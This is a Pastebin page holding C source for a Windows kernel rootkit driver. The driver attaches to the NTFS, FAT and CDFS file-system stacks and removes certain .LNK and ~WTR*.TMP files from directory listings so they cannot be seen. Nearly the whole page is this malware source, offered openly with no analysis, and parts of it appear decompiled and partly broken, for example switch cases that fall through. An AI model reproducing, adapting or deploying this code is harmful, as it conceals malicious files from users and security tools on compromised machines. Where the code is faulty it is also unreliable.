API tools faq
paste
Advertisement
FlyFar

rootkit_main

FlyFar
Feb 18th, 2023
516
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 23.07 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #include <ntifs.h>
  2.  
  3. typedef struct _DEVICE_EXTENSION
  4. {
  5.   PDEVICE_OBJECT AttachedDevice;
  6.   PDEVICE_OBJECT RealDevice;          //Used in File System Control
  7.  
  8. }_DEVICE_EXTENSION, *PDEVICE_EXTENSION;
  9.  
  10. extern POBJECT_TYPE* IoDriverObjectType;
  11.  
  12. typedef struct
  13. {
  14.       ULONG Object;
  15.       PDEVICE_OBJECT DeviceObject;
  16. }ReferencedObject;
  17.  
  18.  
  19. //Data:
  20. //-----
  21.  
  22. FAST_IO_DISPATCH g_fastIoDispatch;
  23. PDRIVER_OBJECT DriverObject;
  24. PDEVICE_OBJECT DeviceObject;
  25. PCWSTR aObreferenceobjectbyname = L"ObReferenceObjectByName";
  26. PCWSTR FileSystemsArray[3] = {
  27.                       L"\\FileSystem\\ntfs",
  28.                       L"\\FileSystem\\fastfat",
  29.                       L"\\FileSystem\\cdfs",
  30.                       };
  31.  
  32. PCWSTR BannedDirecoty = L"{58763ECF-8AC3-4a5f-9430-1A310CE4BE0A}";
  33. PCWSTR DebugMSG = L"b:\\myrtus\\src\\objfre_w2k_x86\\i386\\guava.pdb";
  34.  
  35.  
  36. //ProtoTyping:
  37. //------------
  38.  
  39. #define  FUNC  NTSTATUS (*ObReferenceObjectByNameFunc)(PUNICODE_STRING ObjectName,\
  40.          ULONG Attributes,\
  41.          PACCESS_STATE AccessState,\
  42.          ACCESS_MASK DesiredAccess,\
  43.          POBJECT_TYPE ObjectType,\
  44.          KPROCESSOR_MODE AccessMode,\
  45.          PVOID ParseContext OPTIONAL,\
  46.          PVOID* Object)
  47.  
  48. VOID SetFastIoDispatch();
  49. NTSTATUS HookingFileSystems();
  50. VOID HookOne(FUNC,PCWSTR FileSystem);
  51. VOID DriverNotificationRoutine(PDEVICE_OBJECT TargetDevice,int command);
  52. VOID AttachDevice(PDEVICE_OBJECT TargetDevice);
  53. BOOLEAN IsAllreadyAttached(PDEVICE_OBJECT TargetDevice);
  54. NTSTATUS CreateDevice(PDEVICE_OBJECT TargetDevice,PDEVICE_OBJECT *SourceDevice);
  55. BOOLEAN IsMyDevice(PDEVICE_OBJECT TargetDevice);
  56. VOID SettingFlags(PDEVICE_OBJECT DeviceObject,PDEVICE_OBJECT TargetDevice);
  57. BOOLEAN AttachToStack(PDEVICE_OBJECT SourceDevice,PDEVICE_OBJECT TargetDevice,PDEVICE_EXTENSION DeviceExtension);
  58. VOID OnFileSystemControl(PDEVICE_OBJECT DeviceObject,PIRP Irp);
  59. VOID SetCompletionFileControl(PDEVICE_OBJECT TargetDevice,PIRP Irp);
  60. NTSTATUS SetFSCompletionRoutine(PDEVICE_OBJECT DeviceObject,PIRP Irp);
  61. NTSTATUS FileControlCompletionRoutine(PDEVICE_OBJECT DeviceObject,PIRP Irp,PDEVICE_OBJECT* Context);
  62. BOOLEAN AttachDelayThread(PDEVICE_OBJECT DeviceObject,PDEVICE_OBJECT TargetDevice);
  63. VOID OnDirectoryControl(PDEVICE_OBJECT DeviceObject,PIRP Irp);
  64. VOID SetCompletionDirControl(PDEVICE_OBJECT DeviceObject,PIRP Irp);
  65. NTSTATUS DirectoryCompletionRoutine(PDEVICE_OBJECT DeviceObject,PIRP Irp,PDEVICE_OBJECT* Context);
  66. VOID FreeMdl(PIRP Irp,PMDL* Context);
  67. ULONG AllocateMdl(PMDL* LclContext,PIRP Irp,PIO_STACK_LOCATION CurrentStack);
  68. ULONG CreateWorkRoutine(PDEVICE_OBJECT DeviceObject,PIO_STACK_LOCATION CurrentStack,PIRP Irp,PVOID LclContext);
  69. NTSTATUS WorkerRoutine(PDEVICE_OBJECT DeviceObject,PLARGE_INTEGER Context);
  70. ULONG GetOffsets(ULONG FileInformationClass,ULONG* EndOfFile,ULONG* FilenameOffset,ULONG* FilenameLength);
  71. ULONG FileCheck (PVOID UserBuffer,ULONG NextEntryOffset,ULONG EndOfFile,ULONG FilenameOffset,ULONG FilenameLength);
  72. ULONG StrCheck(PCWSTR TargetString,PCWSTR SourceString,int Size);
  73. ULONG TMPCheck(PCWSTR Filename,int Length,int LowPart,int HighPart);
  74.  
  75.  
  76. //Functions:
  77. //----------
  78.  
  79. VOID CallDriver(PDEVICE_OBJECT DeviceObject,PIRP Irp)
  80. {
  81.  
  82.      Irp->CurrentLocation++;
  83.      Irp->Tail.Overlay.CurrentStackLocation = ((ULONG)Irp->Tail.Overlay.CurrentStackLocation + (ULONG)sizeof(IO_STACK_LOCATION));// 0x24);
  84.      IoCallDriver(((PDEVICE_EXTENSION)(DeviceObject->DeviceExtension))->AttachedDevice,Irp);
  85. };
  86.  
  87.  
  88. VOID IRPDispatchRoutine(PDEVICE_OBJECT DeviceObject,PIRP Irp)
  89. {
  90.     return CallDriver(DeviceObject,Irp);
  91.  
  92. }
  93.  
  94.  
  95. VOID SetZero(PDEVICE_EXTENSION DeviceExtention,ULONG Value){
  96.     DeviceExtention->AttachedDevice=(PDEVICE_OBJECT)0;
  97.     DeviceExtention->RealDevice=(PDEVICE_OBJECT)0;
  98.     DeviceExtention->RealDevice=(PDEVICE_OBJECT)Value;
  99. };
  100.  
  101.  
  102. /**-------------------------------------------------------------------
  103.     Driver Entry
  104. ----------------------------------------------------------------------**/
  105.  
  106.  
  107. NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
  108. {
  109.     int i;
  110.     NTSTATUS status;
  111.     DriverObject=pDriverObject;
  112.     status=IoCreateDevice(DriverObject, sizeof(_DEVICE_EXTENSION),0,FILE_DEVICE_DISK_FILE_SYSTEM,0x100,0,&DeviceObject);
  113.     if (status!=STATUS_SUCCESS){
  114.         IoDeleteDevice(DeviceObject);
  115.         return 0;  
  116.     }
  117.     SetZero(DeviceObject->DeviceExtension,0);
  118.     for(i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++ )
  119.     {
  120.        DriverObject->MajorFunction[i] = IRPDispatchRoutine;
  121.     }
  122.     DriverObject->MajorFunction[IRP_MJ_FILE_SYSTEM_CONTROL] = OnFileSystemControl;
  123.     DriverObject->MajorFunction[IRP_MJ_DIRECTORY_CONTROL] =  OnDirectoryControl;
  124.     SetFastIoDispatch();
  125.     HookingFileSystems();
  126.     status = IoRegisterFsRegistrationChange( DriverObject, (PDRIVER_FS_NOTIFICATION)DriverNotificationRoutine);
  127.     if (status!=STATUS_SUCCESS){    
  128.         IoDeleteDevice(DeviceObject);
  129.         DriverObject->FastIoDispatch = 0;
  130.         return status; //Error
  131.     }
  132.     return STATUS_SUCCESS;
  133. };
  134.  
  135. /**-------------------------------------------------------------------
  136.     Hooking File Systems
  137. ----------------------------------------------------------------------**/
  138.  
  139. NTSTATUS HookingFileSystems()
  140. {
  141.      UNICODE_STRING SystemRoutineName;
  142.      int i;
  143.      ULONG (*FunctionAddress)();
  144.      RtlInitUnicodeString(&SystemRoutineName,aObreferenceobjectbyname);
  145.      FunctionAddress = MmGetSystemRoutineAddress(&SystemRoutineName);
  146.      if (FunctionAddress == 0)return 0;
  147.      for (i = 0; i < 3;i++){
  148.         HookOne(FunctionAddress,FileSystemsArray[i]);
  149.      };
  150.      return STATUS_SUCCESS;
  151. }
  152.  
  153. VOID HookOne(FUNC,PCWSTR FileSystem)
  154. {
  155.      UNICODE_STRING DestinationString;
  156.      NTSTATUS Status;
  157.      PDEVICE_OBJECT AttachObject;
  158.      Status = STATUS_SUCCESS;
  159.      RtlInitUnicodeString(&DestinationString,FileSystem);
  160.      Status = (*ObReferenceObjectByNameFunc)(&DestinationString,0x40,0,0,*IoDriverObjectType,0,0,(PVOID)&FileSystem);
  161.      if (Status!=STATUS_SUCCESS){
  162.         return;
  163.       };
  164.       AttachObject=0;
  165.       AttachObject =((ReferencedObject*)FileSystem)->DeviceObject;
  166.       while (AttachObject != 0)
  167.       {
  168.          DriverNotificationRoutine(AttachObject,1);
  169.          AttachObject = (PDEVICE_OBJECT)*((int*)((ULONG)AttachObject + (ULONG)0x0C));          //Next Element
  170.       };
  171.       ObDereferenceObject(((ReferencedObject*)FileSystem));
  172. };
  173. /**-------------------------------------------------------------------
  174.     Driver Notification Routine
  175. ----------------------------------------------------------------------**/
  176. #define COMMAND_ATTACH 1
  177. #define COMMAND_DETACH 0
  178. VOID DriverNotificationRoutine(PDEVICE_OBJECT TargetDevice,int command)
  179. {
  180.     PDEVICE_OBJECT AttachedDevice;
  181.    
  182.     if (command == COMMAND_ATTACH){
  183.         AttachDevice(TargetDevice);
  184.     }else{
  185.         AttachedDevice=TargetDevice->AttachedDevice;
  186.         while(AttachedDevice !=0){
  187.             if (IsMyDevice(AttachedDevice) == TRUE){
  188.                 IoDetachDevice(TargetDevice);
  189.                 IoDeleteDevice(AttachedDevice);
  190.                 break;
  191.             };
  192.             TargetDevice=AttachedDevice;                    //The parent Device (to detach)
  193.             AttachedDevice=TargetDevice->AttachedDevice;    //Get The Next Attached Device
  194.         };
  195.          
  196.     };
  197. };
  198. /**-------------------------------------------------------------------
  199.     Attaching Device
  200. ----------------------------------------------------------------------**/
  201. VOID AttachDevice(PDEVICE_OBJECT TargetDevice)
  202. {
  203.  
  204.     PDEVICE_OBJECT SourceDevice;
  205.     if (TargetDevice->DeviceType == FILE_DEVICE_DISK_FILE_SYSTEM || TargetDevice->DeviceType == FILE_DEVICE_CD_ROM_FILE_SYSTEM || TargetDevice->DeviceType ==  FILE_DEVICE_NETWORK_FILE_SYSTEM)
  206.     {
  207.       if (IsAllreadyAttached(TargetDevice) == TRUE) return;
  208.       if (CreateDevice(TargetDevice,&SourceDevice) != STATUS_SUCCESS)return;
  209.       SettingFlags(SourceDevice,TargetDevice);
  210.       SetZero(SourceDevice->DeviceExtension,0);
  211.       if (AttachToStack(SourceDevice,TargetDevice,SourceDevice->DeviceExtension)!= TRUE){
  212.           IoDeleteDevice(SourceDevice);
  213.           return;        
  214.       };
  215.     };
  216. };
  217. BOOLEAN IsAllreadyAttached(PDEVICE_OBJECT TargetDevice)
  218. {
  219.   PDEVICE_OBJECT AttachedDevice;
  220.   if(TargetDevice != 0){
  221.       AttachedDevice=TargetDevice->AttachedDevice;
  222.       while(AttachedDevice !=0){
  223.             if (AttachedDevice->DriverObject == DriverObject && AttachedDevice->DeviceExtension !=0){
  224.                 return TRUE;                                //Allready Attached
  225.             };
  226.             AttachedDevice=AttachedDevice->AttachedDevice;    //Get The Next Attached Device
  227.         };
  228.          
  229.   }
  230.   return FALSE;
  231. }
  232.  
  233. NTSTATUS CreateDevice(PDEVICE_OBJECT TargetDevice,PDEVICE_OBJECT *SourceDevice)
  234. {
  235.   return IoCreateDevice(DriverObject,sizeof(_DEVICE_EXTENSION),0,TargetDevice->DeviceType,0,0,SourceDevice);
  236.  
  237. }
  238.  
  239. BOOLEAN IsMyDevice(PDEVICE_OBJECT TargetDevice)
  240. {
  241.   if (TargetDevice != 0 && TargetDevice->DriverObject == DriverObject){
  242.                 return TRUE;                                //Allready Attached
  243.   };
  244.   return FALSE;
  245. };
  246.  
  247. VOID SettingFlags(PDEVICE_OBJECT DeviceObject,PDEVICE_OBJECT TargetDevice)
  248. {
  249.   DeviceObject->Flags |= (TargetDevice->Flags & (0x40000 | 0x10 | DO_BUFFERED_IO));
  250.   DeviceObject->Characteristics |= (TargetDevice->Characteristics & FILE_DEVICE_SECURE_OPEN);
  251. };
  252.  
  253. BOOLEAN AttachToStack(PDEVICE_OBJECT SourceDevice,PDEVICE_OBJECT TargetDevice,PDEVICE_EXTENSION DeviceExtension)
  254. {
  255.   DeviceExtension->AttachedDevice = TargetDevice;
  256.   if (IoAttachDeviceToDeviceStack(SourceDevice,TargetDevice) == STATUS_SUCCESS){
  257.       return TRUE;  
  258.   };
  259.   return FALSE;
  260. }
  261.  
  262. /**-------------------------------------------------------------------
  263.     File System Control
  264. ----------------------------------------------------------------------**/
  265.  
  266. VOID OnFileSystemControl(PDEVICE_OBJECT DeviceObject,PIRP Irp)
  267. {
  268.   if (Irp->Tail.Overlay.CurrentStackLocation->MinorFunction == IRP_MN_MOUNT_VOLUME){
  269.       SetCompletionFileControl(DeviceObject,Irp);
  270.   }else{
  271.     return CallDriver(DeviceObject,Irp);
  272.   }
  273. };
  274.  
  275. VOID SetCompletionFileControl(PDEVICE_OBJECT TargetDevice,PIRP Irp)
  276. {
  277.   PDEVICE_OBJECT DeviceObject = 0;
  278.   if (CreateDevice(TargetDevice,&DeviceObject) != STATUS_SUCCESS){
  279.       Irp->IoStatus.Information=0;
  280.       Irp->IoStatus.Status=STATUS_SUCCESS;
  281.       IoCompleteRequest(Irp,0);
  282.       return;
  283.   };
  284.   SetZero(DeviceObject->DeviceExtension,Irp->Tail.Overlay.CurrentStackLocation->Parameters.MountVolume.Vpb->RealDevice);
  285.   if (SetFSCompletionRoutine(DeviceObject,Irp) == 0){
  286.      Irp->CurrentLocation++;
  287.      Irp->Tail.Overlay.CurrentStackLocation = ((ULONG)Irp->Tail.Overlay.CurrentStackLocation + (ULONG)sizeof(IO_STACK_LOCATION));// 0x24);
  288.   };
  289.   return IoCallDriver(((PDEVICE_EXTENSION)(DeviceObject->DeviceExtension))->AttachedDevice,Irp);
  290. };
  291.  
  292.  
  293. NTSTATUS SetFSCompletionRoutine(PDEVICE_OBJECT DeviceObject,PIRP Irp)
  294. {
  295.   int i;
  296.   ULONG* CurrentStack;
  297.   ULONG* PrevStack;
  298.   PIO_STACK_LOCATION PrevIrpStack;
  299.   PDEVICE_OBJECT* Buff=ExAllocatePool(0,4);
  300.   if (Buff==0){
  301.       return 0;
  302.   };
  303.   *Buff = DeviceObject;
  304.   CurrentStack = Irp->Tail.Overlay.CurrentStackLocation;
  305.   PrevStack = ((ULONG)Irp->Tail.Overlay.CurrentStackLocation - (ULONG)sizeof(IO_STACK_LOCATION));
  306.  
  307.   for (i = 0;i<8;i++){
  308.     PrevStack[i]=CurrentStack[i];
  309.   };
  310.   PrevIrpStack = ((ULONG)Irp->Tail.Overlay.CurrentStackLocation - (ULONG)sizeof(IO_STACK_LOCATION));
  311.   PrevIrpStack->Control=0;
  312.   PrevIrpStack->Context = Buff;
  313.   PrevIrpStack->CompletionRoutine = FileControlCompletionRoutine;
  314.   PrevIrpStack->Control=0xE0;
  315.   return 1;
  316. };
  317.  
  318.  
  319. NTSTATUS FileControlCompletionRoutine(PDEVICE_OBJECT DeviceObject,PIRP Irp,PDEVICE_OBJECT* Context)
  320. {
  321.   PDEVICE_OBJECT TargetDevice;
  322.   TargetDevice = ((PDEVICE_EXTENSION)((*Context)->DeviceExtension))->RealDevice->Vpb->DeviceObject;
  323.   if (Irp->IoStatus.Status != STATUS_SUCCESS)
  324.   {
  325.     IoDeleteDevice(DeviceObject);
  326.     ExFreePoolWithTag(Context,0);
  327.   }
  328.   if (IsAllreadyAttached(TargetDevice) == TRUE){
  329.     IoDeleteDevice(DeviceObject);
  330.     ExFreePoolWithTag(Context,0);
  331.     return STATUS_SUCCESS;
  332.   };
  333.   if (AttachDelayThread(*Context,TargetDevice) != TRUE){
  334.     IoDeleteDevice(DeviceObject);
  335.   };
  336.   ExFreePoolWithTag(Context,0);
  337.   return STATUS_SUCCESS;
  338. };
  339.  
  340. BOOLEAN AttachDelayThread(PDEVICE_OBJECT DeviceObject,PDEVICE_OBJECT TargetDevice)
  341. {
  342.   LARGE_INTEGER Interval;
  343.   int i;
  344.   SettingFlags(DeviceObject,TargetDevice);
  345.   for ( i = 0;i<8 ;i++){
  346.     if (AttachToStack(DeviceObject,TargetDevice,DeviceObject->DeviceExtension)== TRUE){
  347.         return TRUE;        
  348.     };
  349.     *((ULONG*)((ULONG)&Interval+(ULONG)4)) = -1;
  350.     *((ULONG*)&Interval) = -5000000;
  351.     KeDelayExecutionThread(0,FALSE,&Interval);
  352.   };
  353.   return FALSE;
  354. };
  355. /**-------------------------------------------------------------------
  356.     Directory Control
  357. ----------------------------------------------------------------------**/
  358.  
  359. VOID OnDirectoryControl(PDEVICE_OBJECT DeviceObject,PIRP Irp)
  360. {
  361.   if (Irp->Tail.Overlay.CurrentStackLocation->MinorFunction == IRP_MN_QUERY_DIRECTORY){
  362.       SetCompletionDirControl(DeviceObject,Irp);
  363.   }else{
  364.     return CallDriver(DeviceObject,Irp);
  365.   }
  366. };
  367.  
  368. VOID SetCompletionDirControl(PDEVICE_OBJECT DeviceObject,PIRP Irp)
  369. {
  370.   PUNICODE_STRING Filename;
  371.   PIO_STACK_LOCATION CurrentStack;
  372.   PIO_STACK_LOCATION PrevStack;
  373.   PIO_STACK_LOCATION PrevIrpStack;
  374.   int i;
  375.   CurrentStack = Irp->Tail.Overlay.CurrentStackLocation;
  376.   if (!(CurrentStack->FileObject->Flags & 0x400000) && CurrentStack->FileObject != 0){
  377.     Irp->Tail.Overlay.CurrentStackLocation->Parameters.QueryDirectory.FileName = 0; //Clear Filename
  378.     if (CurrentStack->FileObject != 0)CurrentStack->FileObject->Flags &= 0x400000;
  379.     CallDriver(DeviceObject,Irp);
  380.   }
  381.   Filename = CurrentStack->Parameters.QueryDirectory.FileName;
  382.   if (Filename != 0 && Filename->Length == 0x4C /*The Size of BannedDirectory*/ ){
  383.       for (i =0;i< 19; i++)
  384.       {
  385.           if ((ULONG)BannedDirecoty[i] == (ULONG)Filename->Buffer[i]){
  386.               goto Error;
  387.           };
  388.       };
  389.       goto Inject;
  390. Error:
  391.  
  392.     CurrentStack->Parameters.QueryDirectory.FileName = 0; //Clear Filename
  393.     if (Irp->Tail.Overlay.CurrentStackLocation->FileObject != 0)Irp->Tail.Overlay.CurrentStackLocation->FileObject->Flags &= 0x400000;
  394.     CallDriver(DeviceObject,Irp);
  395.     return;
  396.   };
  397.  
  398. Inject:
  399.  
  400.   CurrentStack->Control=1;
  401.   PrevStack = ((ULONG)Irp->Tail.Overlay.CurrentStackLocation - (ULONG)sizeof(IO_STACK_LOCATION));
  402.  
  403.   for (i = 0;i<8;i++){
  404.     PrevStack[i]=CurrentStack[i];
  405.   };
  406.   PrevIrpStack = ((ULONG)Irp->Tail.Overlay.CurrentStackLocation - (ULONG)sizeof(IO_STACK_LOCATION));
  407.   PrevIrpStack->Control = 0;
  408.   PrevIrpStack->Context = 0;
  409.   PrevIrpStack->CompletionRoutine = DirectoryCompletionRoutine;
  410.   PrevIrpStack->Control=0xE0;
  411.   return IoCallDriver(((PDEVICE_EXTENSION)(DeviceObject->DeviceExtension))->AttachedDevice,Irp);
  412. };
  413.  
  414.  
  415. NTSTATUS DirectoryCompletionRoutine(PDEVICE_OBJECT DeviceObject,PIRP Irp,PDEVICE_OBJECT* Context)
  416. {
  417.   ULONG EndOfFile;
  418.   ULONG FilenameOffset;
  419.   ULONG LclContext;
  420.   ULONG FilenameLength;
  421.   PVOID mmFiles;
  422.   LclContext = (ULONG)Context;
  423.   if (Irp->IoStatus.Status != STATUS_SUCCESS){
  424.     FreeMdl(Irp,LclContext);
  425.     return 0;
  426.   };
  427.   if (GetOffsets(Irp->Tail.Overlay.CurrentStackLocation->Parameters.QueryDirectory.FileInformationClass, \
  428.                               &EndOfFile,&FilenameOffset,&FilenameLength) == 0){
  429.     FreeMdl(Irp,LclContext);
  430.     return 0;
  431.   };
  432.   if (Irp->MdlAddress != 0){
  433.     if (Irp->MdlAddress->MdlFlags  == 5){
  434.       //maps the physical pages that are described by The MDL to a virtual address
  435.       mmFiles=MmMapLockedPagesSpecifyCache(Irp->MdlAddress,0,MmCached,0,0,0x10);
  436.       if (mmFiles == 0){
  437.         FreeMdl(Irp,LclContext);
  438.         return 0;
  439.       };
  440.     }else if (Irp->MdlAddress->MappedSystemVa == 0){
  441.       FreeMdl(Irp,LclContext);
  442.       return 0;  
  443.     };
  444.   }else{
  445.     mmFiles=Irp->UserBuffer;
  446.   };
  447.   if (FileCheck(mmFiles,Irp->Tail.Overlay.CurrentStackLocation->Parameters.QueryDirectory.Length, \
  448.                             EndOfFile,FilenameOffset,FilenameLength) != 0){
  449.     Irp->IoStatus.Status = STATUS_SUCCESS;
  450.     FreeMdl(Irp,Context);
  451.     return 0;
  452.   };
  453.   if (Irp->MdlAddress == 0){
  454.       LclContext = ExAllocatePool(0,4);
  455.       if (LclContext == 0 || AllocateMdl(LclContext,Irp,Irp->Tail.Overlay.CurrentStackLocation) == 0){
  456.         FreeMdl(Irp,LclContext);
  457.         Irp->IoStatus.Status=0x0C000009A;
  458.         return 0;  
  459.       };
  460.   };
  461.    Irp->IoStatus.Status = CreateWorkRoutine(DeviceObject,Irp->Tail.Overlay.CurrentStackLocation,Irp,LclContext);
  462.    return;
  463. };
  464.  
  465. VOID FreeMdl(PIRP Irp,PMDL* Context)
  466. {
  467.   if (Irp->MdlAddress == *Context){
  468.        Irp->MdlAddress=0;
  469.        MmUnlockPages((PMDL)*Context);
  470.        IoFreeMdl(*Context);
  471.   };
  472.   ExFreePoolWithTag(*Context,0);
  473.  
  474. };
  475.  
  476. ULONG AllocateMdl(PMDL* LclContext,PIRP Irp,PIO_STACK_LOCATION CurrentStack)
  477. {
  478.   PMDL pMdl;
  479.   pMdl = IoAllocateMdl(Irp->UserBuffer,CurrentStack->Parameters.QueryDirectory.Length,0,0,Irp);
  480.   if (pMdl ==0){
  481.     return 0;
  482.   };
  483.   MmProbeAndLockPages(pMdl,0,IoModifyAccess);
  484.   Irp->MdlAddress = pMdl;
  485.   *LclContext = pMdl;
  486.   return 1;
  487. };
  488.  
  489. ULONG CreateWorkRoutine(PDEVICE_OBJECT DeviceObject,PIO_STACK_LOCATION CurrentStack,PIRP Irp,PVOID LclContext)
  490. {
  491.   PLARGE_INTEGER pPool;
  492.   PIO_STACK_LOCATION PrevIrpStack;
  493.   int i;
  494.   pPool = ExAllocatePool(0,8);
  495.   if (pPool == 0){
  496.     return 0xC000009A;
  497.   };
  498.   pPool->u.LowPart = IoAllocateWorkItem(DeviceObject);
  499.   if (pPool->u.LowPart == 0){
  500.     return 0xC000009A;
  501.   };
  502.   pPool->u.HighPart=Irp;
  503.   CurrentStack->Flags &= 0xFE;
  504.   CurrentStack->Parameters.QueryDirectory.FileIndex =0;
  505.   Irp->Tail.Overlay.CurrentStackLocation->Control |= 1;
  506.   PrevIrpStack = ((ULONG)Irp->Tail.Overlay.CurrentStackLocation - (ULONG)sizeof(IO_STACK_LOCATION));
  507.   for (i = 0;i<8;i++){
  508.     PrevIrpStack[i]=CurrentStack[i];
  509.   };
  510.   PrevIrpStack->Control=0;
  511.   PrevIrpStack->Context = LclContext;
  512.   PrevIrpStack->CompletionRoutine = DirectoryCompletionRoutine;
  513.   PrevIrpStack->Control=0xE0;
  514.   IoQueueWorkItem(pPool->u.LowPart,WorkerRoutine,1,pPool);
  515.   return 0xC0000016;
  516. };
  517.  
  518. NTSTATUS WorkerRoutine(PDEVICE_OBJECT DeviceObject,PLARGE_INTEGER Context)
  519. {
  520.   IoCallDriver(((PDEVICE_EXTENSION)(DeviceObject->DeviceExtension))->AttachedDevice,Context->u.HighPart);
  521.   IoFreeWorkItem(Context->u.LowPart);
  522.   ExFreePoolWithTag(Context,0);
  523.   return STATUS_SUCCESS;
  524. };
  525.  
  526. /**-------------------------------------------------------------------
  527.     File Checking
  528. ----------------------------------------------------------------------**/
  529.  
  530. ULONG GetOffsets(ULONG FileInformationClass,ULONG* EndOfFile,ULONG* FilenameOffset,ULONG* FilenameLength)
  531. {
  532.   switch (FileInformationClass) {
  533.    case FileBothDirectoryInformation :
  534.          *EndOfFile = FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, EndOfFile);
  535.          *FilenameOffset = FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileName);
  536.    case FileDirectoryInformation:
  537.       *EndOfFile = FIELD_OFFSET(FILE_DIRECTORY_INFORMATION, EndOfFile);
  538.       *FilenameOffset = FIELD_OFFSET(FILE_DIRECTORY_INFORMATION, FileName);
  539.    case FileFullDirectoryInformation:
  540.       *EndOfFile = FIELD_OFFSET( FILE_FULL_DIR_INFORMATION , EndOfFile);
  541.       *FilenameOffset = FIELD_OFFSET( FILE_FULL_DIR_INFORMATION , FileName);
  542.    case FileIdBothDirectoryInformation:
  543.       *EndOfFile = FIELD_OFFSET( FILE_ID_BOTH_DIR_INFORMATION, EndOfFile);
  544.       *FilenameOffset = FIELD_OFFSET( FILE_ID_BOTH_DIR_INFORMATION, FileName);
  545.    case FileIdFullDirectoryInformation:
  546.       *EndOfFile = FIELD_OFFSET( FILE_ID_FULL_DIR_INFORMATION, EndOfFile);
  547.       *FilenameOffset = FIELD_OFFSET( FILE_ID_FULL_DIR_INFORMATION, FileName);
  548.    case FileNamesInformation:
  549.       *EndOfFile = -1;
  550.       *FilenameOffset = FIELD_OFFSET( FILE_NAMES_INFORMATION, FileName);
  551.       *FilenameLength = FIELD_OFFSET(FILE_NAMES_INFORMATION, FileNameLength);
  552.       return 1;
  553.     default:
  554.       return 0;
  555.   };
  556.   *FilenameLength = FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileNameLength);
  557.   return 1;
  558. };
  559.  
  560. ULONG FileCheck (ULONG* UserBuffer,ULONG NextEntryOffset,ULONG EndOfFile,ULONG FilenameOffset,ULONG FilenameLength)
  561. {
  562.   LARGE_INTEGER FileSize;
  563.   ULONG EntryPtr;
  564.   ULONG PrevOffset;
  565.   PCWSTR Filename;
  566.   ULONG Length;
  567.  
  568.   EntryPtr = 0;
  569.   PrevOffset = NextEntryOffset;
  570.   (ULONG)UserBuffer &= 0xFFFFFF00;
  571.   if (NextEntryOffset == 0){
  572.     return 1;
  573.   };
  574.   do{
  575.     NextEntryOffset = *UserBuffer;
  576.     if (EndOfFile == -1){   //FileNamesInformation
  577.       FileSize.u.LowPart=0;
  578.       FileSize.u.HighPart=0;
  579.     };
  580.     FileSize.u.LowPart = *((ULONG*)((ULONG)UserBuffer + EndOfFile));
  581.     FileSize.u.HighPart = *((ULONG*)((ULONG)UserBuffer + EndOfFile + 4));
  582.     Length = *((ULONG*)((ULONG)UserBuffer + FilenameLength));
  583.     Filename = (PCWSTR)((ULONG)UserBuffer + FilenameOffset);
  584.     if (Length & 1){         //mean couldn't be divided by 2 (That's will be strange because it's a unicode string (Wide char))
  585.       EntryPtr = UserBuffer;
  586.       UserBuffer+=NextEntryOffset;
  587.       (ULONG)UserBuffer |= 0x01;    //mov     byte ptr [ebp+UserBuffer+3], 1
  588.       PrevOffset  -= NextEntryOffset;
  589.       continue;
  590.     };
  591.     Length -= FilenameOffset;   //I don't know why
  592.     Length /= 2;                  //number of characters
  593.     if ((((FileSize.u.HighPart != -1) && (FileSize.u.LowPart != -1)) || (FileSize.u.HighPart == 0 && FileSize.u.LowPart == 4171)) && (Length > 4)){
  594.       if (StrCheck(L".LNK",&Filename[Length -4],4) != 0){
  595.         memmove(UserBuffer,UserBuffer + NextEntryOffset,PrevOffset - NextEntryOffset);
  596.         PrevOffset  -= NextEntryOffset;
  597.         continue;
  598.       };
  599.     };
  600.     if (TMPCheck(Filename,Length,FileSize.u.LowPart,FileSize.u.HighPart) ==0){
  601.       EntryPtr = UserBuffer;
  602.       UserBuffer+=NextEntryOffset;
  603.       (ULONG)UserBuffer |= 0x01;    //mov     byte ptr [ebp+UserBuffer+3], 1
  604.     }else{
  605.       if (NextEntryOffset != 0){
  606.         memmove(UserBuffer,UserBuffer + NextEntryOffset,PrevOffset - NextEntryOffset);
  607.       }else{
  608.         if (EntryPtr !=0)EntryPtr = 0;
  609.         break;
  610.       };
  611.     };
  612.     PrevOffset  -= NextEntryOffset;
  613.   }while ( PrevOffset != 0);
  614.   return ((ULONG)UserBuffer & 1);      // cmp     byte ptr [ebp+UserBuffer+3], 0  / setnz   al
  615. };
  616.  
  617. ULONG StrCheck(PCWSTR TargetString,PCWSTR SourceString,int Size)
  618. {
  619.   WCHAR chr;
  620.   if (TargetString[0] == 0) return 1;
  621.   do{
  622.     if (Size == 0)return 0;
  623.     chr = toupper(SourceString[0]);
  624.     if (chr != toupper(TargetString[0]))return 0;
  625.     (ULONG)SourceString += 2;
  626.     (ULONG)TargetString += 2;
  627.     Size--;
  628.   }while(TargetString[0] !=0);
  629.   return 1;
  630. };
  631.  
  632. ULONG TMPCheck(PCWSTR Filename,int Length,int LowPart,int HighPart)
  633. {
  634.   int i;
  635.   WCHAR chr;
  636.   int Mod = 0;
  637.   if (!(LowPart == -1 && HighPart == -1) && (HighPart == 0 || LowPart < 4096 || LowPart > 8388608)) return 0;
  638.   if (Length !=12)return 0;
  639.   if (StrCheck(L".TMP",&Filename[Length -4],4) == 0)return 0;
  640.   if (StrCheck(L"~WTR",Filename,4) == 0)return 0;
  641.   for (i = 4;i < 8; i++){
  642.     chr = Filename[i];
  643.     if (chr<'0' || chr >'9')return 0;
  644.     Mod =(chr - 0x30 + Mod) % 10;
  645.   };
  646.   if (Mod == 0)return 1;
  647.   return 0;
  648. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!